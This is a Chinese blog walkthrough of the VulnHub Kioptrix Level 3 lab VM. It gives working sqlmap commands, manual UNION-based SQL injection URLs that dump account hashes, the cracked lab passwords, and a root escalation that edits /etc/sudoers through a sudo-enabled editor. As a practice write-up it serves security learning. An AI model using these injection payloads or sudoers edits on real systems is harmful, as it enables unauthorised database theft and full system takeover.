vulnhub KioptrixVM3 靶场练习&KVM3练习

已于 2024-03-01 18:57:31 修改
阅读量1k 收藏 15
点赞数 22
文章标签: linux 运维 服务器 web安全 网络安全
于 2024-02-26 20:09:48 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jockerboss/article/details/136306762
版权

心血来潮发表我的第一篇文章,希望大佬能指出我的不足,谢谢!

靶场下载地址:https://www.vulnhub.com/entry/kioptrix-level-12-3,24​​​​​​/Kioptrix: Level 1.2 (#3), made by Kioptrix. Download & walkthrough links are available.icon-default.png?t=N7T8https://www.vulnhub.com/entry/kioptrix-level-12-3,24/

解压打开后就该我们进行操作啦!

获取靶场ip

获取靶场ip:nmap -sn 192.168.1.1/24  (-sn:Ping扫描-禁用端口扫描)

扫描ip并把结果输出到kvm3文件夹并命名为attack方便查看:nmap 192.168.1.3 -A -oA kvm3/attack

(-oA:同时输出三种主要格式     -A:启动Os检测,版本检测,脚本扫描和traceroute)

在网页输入ip查看80端口内容

在该链接的跳转内容中发现

这些链接都会先行跳转到:http://kioptrix3.com/gallery/p.php/5

将该链接替换为http://192.168.1.3/gallery/p.php/5   发现可以正常访问!

遂修改host文件(C:\Windows\System32\drivers\etc\hosts)

因为发现网站会从IP地址跳转到  kioptrix3.com,把该网址重新替换为ip地址发现依然可以访问,遂修改host文件进行自动解析,方便后续测试或访问

进行web渗透测试

该url(http://kioptrix3.com/gallery/gallery.php?id=1&sort=photoid#photos)中

可能存在sql注入漏洞,用sqlmap进行渗透

python sqlmap.py -u "http://kioptrix3.com/gallery/gallery.php?id=1&sort=photoid#photos" --batch --dbs

成功获取到数据库

因为在之前的页面浏览中发现有登录网页,所以数据库中大概率会有账号密码

获取表:

python sqlmap.py -u "http://kioptrix3.com/gallery/gallery.php?id=1&sort=photoid#photos" --batch -D gallery --tables

获取表数据:

python sqlmap.py -u "http://kioptrix3.com/gallery/gallery.php?id=1&sort=photoid#photos" --batch -D gallery -T dev_accounts --columns

获取账号密码:

python sqlmap.py -u "http://kioptrix3.com/gallery/gallery.php?id=1&sort=photoid#photos" --batch -D gallery -T dev_accounts -C username,password --dump

sqlmap帮我们自动爆破出密码了

手动注入方式进行渗透:

注入url:

http://kioptrix3.com/gallery/gallery.php?id=1 order by 6--+&sort=photoid#photos

发现有 6 列显示,通过联合查询查看显示位置:

http://kioptrix3.com/gallery/gallery.php?id=1 union select 1,2,3,4,5,6--+&sort=photoid#photos

在“2”的显示位置进行对应查询当前数据库:

http://kioptrix3.com/gallery/gallery.php?id=1 union select 1,database(),3,4,5,6--+&sort=photoid#photos

查询gallery库中所存在的表:

http://kioptrix3.com/gallery/gallery.php?id=1 union select 1,table_name,3,4,5,6 from information_schema.tables where table_schema = "gallery"--+&sort=photoid#photos

查询我们需要的表中的数据(dev_accounts):

http://kioptrix3.com/gallery/gallery.php?id=1 union select 1,column_name,3,4,5,6 from information_schema.columns where table_schema = "gallery" and table_name = "dev_accounts"--+&sort=photoid#photos

查询我们想要的数据字段:

http://kioptrix3.com/gallery/gallery.php?id=1 union select 1,username,password,4,5,6 from dev_accounts --+&sort=photoid#photos

然后将密码进行md5解密得到密码

dreg—Mast3r

loneferret—starwars

获取shell

尝试进行登录,发现账号密码并不正确

还记着最开始的22端口吗?尝试进行SSH登录

发现登陆成功

提权

获取到shell后的下一步就是进行提权操作,常见的提权方法有suid提权,sudo提权,内核提权

  1. 输入 
    sudo -l
    查看当前权限

  2. ht为编辑器并且发现在当前靶场下是root权限,那思路就有了,可以用root权限下的ht编辑器进行修改账户文件,以达到root权限

    输入命令打开编辑器:

    sudo /usr/local/bin/ht

    按F3打开 

    /etc/sudoers

      文件

    我们在第二行后添加   

    ,/bin/bash

    F2保存后ctrl+c退出

    输入

    sudo bash

    命令

    发现提权成功

  3. 或者我们可以在这行下面添加一条命令:

    loneferret ALL=(ALL) ALL 

    (其中第一个ALL代表允许所有主机来源执行sudo,例如只允许该用户在本地执行sudo可以将ALL改成localhost

      第二个代表该用户可以用任何用户的身份执行sudo

      第三个代表该用户可以执行任何命令)

  4. F2保存后ctrl+c退出

    使用

    sudo /bin/bash

    命令进行提权操作

    一样可以提权成功

Brown1.
关注
  • 22
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
KioptrixVM3-writeup
Lee
08-20 439
KioptrixVM3-writeup 0x00 信息收集 nmap -A -T4 -p 1-65535 16.16.16.180 Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-20 15:16 CST
KioptrixVM3
底层社会中的弱智
04-16 470
目标IP 192.168.11.184 作者提示 绑定hosts /etc/hosts 文件中 <ip> kioptrix3.com 端口开放情况 要么ssh爆破或者存在已知漏洞 要么就去80端口找常规十大漏洞 进入80 扫描目录 存在phpmyadmin登录页面 使用的LotusCMS 框架 发现管理登录页面 搜索漏洞利用 进入msf框架...
Kioptrix 3
猎荒者
03-17 610
夫学须静也,才须学也; 非学无以广才,非志无以成学 00 环境准备 Kali(IP:10.10.16.128) Koiptrix 靶机 NAT 网络连接 01 主机发现 nmap -sP 10.10.16.0/24 02 端口扫描 nmap -A -v -sS -sV -p- -T4 10.10.16.153 开放 22(ssh)/ 80(http) 端口 03 目录扫描 dirb ...
Vulnhub系列:kioptrixVM3
Fuzz
08-10 2480
简介 Vulnhub简介 Vulnhub是一个提供各种漏洞环境的靶场平台。 个人学习目的:1,方便学习更多类型漏洞。2,为OSCP做打基础。 下载链接 https://www.vulnhub.com/entry/kioptrix-level-12-3,24/ 运行环境 kali:192.168.44.128 靶机:192.168.44.134 相关知识点 0x00、信息收集 主机发现:nmap -sP 192.168.44.0/24 端口扫描:nmap -sS -sV 192.168.44.134 0
sqli-labs靶场练习笔记
11-09
### SQLi-Labs靶场练习笔记知识点概览 #### 一、SQL注入基本概念与原理 - **定义**:SQL注入是一种常见的应用层攻击方式,它利用编程中的漏洞,通过在应用程序的输入框中插入恶意SQL语句来控制后端数据库服务器。 -...
vulnhub靶场实战系列-DC-3实战
最新发布
05-20
vulnhub靶场实战系列-DC-3实战
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。...
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。...
VulnHub20230718最新全部靶场详情 - 共701个靶场信息
07-18
由于本人最近打靶,但是【VulnHub】网站访问总是有些显示问题,靶场信息查找也很不方便,所以本人总结了【VulnHub】上面所有靶场的全部基本信息,方便各位按照自己需求进行搜索查看
vulnhub靶机渗透 KioptrixVM3
RestoreJustice的博客
03-18 653
​ 下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。192.168.110.133,为靶机ip,也可以使用Kali中的arp-scan工具扫描:arp-scan 192.168.110.1/24。发现phpadmin页面,尝试admin空口令登录成功,但只能看information_schema 数据库,没什么发现。两个账户名和前面读取/etc/passwd下的ssh用户一致,可以尝试解密后登录ssh。
Kioptrix-3 ( 补漏 )
猎荒者
03-18 928
淫漫则不能励精,险躁则不能治性。 上次目录扫描得到数据库登录界面和用户登录界面,普通的字典爆破思路不可取,所以接下来是通过挖掘 web 漏洞得到用户登录的账密。 在 /gallery 目录找到一个疑似 SQL 注入漏洞 使用 sqlmap 对目标 URL 进行漏扫 PS: 使用 sqlmap 之前现在 Kali 的 /etc/hosts 文件中添加进靶机 IP 和域名的映射,不然可能扫不出...
vulnhub KioptrixVM3 靶场练习&LotusCMS漏洞分析
鸥鹭忘机
09-19 2224
前言 这次练习的靶机是vulnhub平台下KiptrixVM3,下载地址为https://www.vulnhub.com/entry/kioptrix-level-12-3,24/。该靶机漏洞较多,获取shell的方法多种多样。相对来说比较简单的一种方法就是通过SQL注入获取账号和密码,然后用这些账号密码尝试ssh登陆靶机,本次对靶机的渗透采用的就是SQL注入的方法。SQL注入的原理比较简单,这里就不做过多的介绍,我会在后面重点分析文件包含和远程代码执行漏洞。 该靶机导入VMware不会分配到IP地址,因为
vulnhub-KIOPTRIX: LEVEL 1.2 (#3)-KioptrixVM3靶场
shulao2010的博客
05-23 355
一个单机靶场,讲解了如何通过简单web漏洞获得主机root权限
Vunlhub靶场 Kioptrix 3
m0_57221101的博客
02-18 361
勘探 nmap探查 port 备注 22/tcp openssh 4.7p1 80/tcp apache 2.2.8 80web 主页是这样的 有一个登录界面 发现这个cms有一个rce漏洞 然后目录扫描出很多东西 python3.9 dirsearch.py -u 192.168.1.104 [20:51:48] 200 - 2KB - /cache/ [
vulnhub靶机测试--Kioptrix 3
ximo的博客
03-25 314
目录前言信息收集主机发现端口扫描目录扫描漏洞利用提权总结 前言 这个系列基本上没有web方面的漏洞,都是系统、CMS版本漏洞;主要是了解一下提权方法。 信息收集 主机发现 端口扫描 目录扫描 漏洞利用 访问80端口: 第一个页面有个page参数,试了试文件包含,失败。 第二个页面有个system参数,命令执行漏洞?? 失败。 第三个页面是一个登录页面,同时知道了CMS。 再看看其他目录: 1.数据库登录后台 2.一个看不懂的(没加载,速度慢的网页): 3.目录遍历,但是啥用没有。 查找CMS
Kioptrix3(SQL注入漏洞,sudoers提权)
m0_66299232的博客
10-29 212
sudo的权限控制可以在/etc/sudoers文件中查看到。一般来说,通过cat /etc/sudoers指令来查看该文件,修改sudoers。3.谷歌Error opening terminal: xterm-256color 找到答案!1.访问网页,发现一个域名,添加到/etc/hosts下。4>在查表的时候,要把gallery进行十进制编译。1>通过order by判断,字段数为6。1.用查出的用户名密码,登录ssh。7>成功查询到用户名,密码。5.保存后,成功提权!6>将表名转换后,查列。
KIOPTRIX: LEVEL 1.2 (#3)
Mysmycbx的博客
03-21 218
发现是lotusCMS,在searchsploit上搜索,没有发现什么有用的信息,那就去google上搜索。发现github里有一个RCE的sh文件,这里下载下来查看。发现mysql数据库内容,这里尝试ssh登录,发现失败,那就进入mysql查看后台数据。没发现什么有用的信息。
学习笔记-Kioptrix3-WalkThrough
人饭子的博客
11-03 234
Kioptrix3-WalkThrough 免责声明 本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关. 靶机地址 https://www.vulnhub.com/entry/kioptrix-level-12-3,24/ Description It's been a while since the last Kioptrix VM c...
sqlmap靶场练习
09-06
对于SQL注入漏洞的测试和练习,可以使用一些特定的靶场网站来进行实践。这些靶场网站专门设计用于测试和学习SQL注入攻击。 以下是一些常用的SQL注入靶场网站: 1. WebGoat:一个开源的Java web应用程序,提供了...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值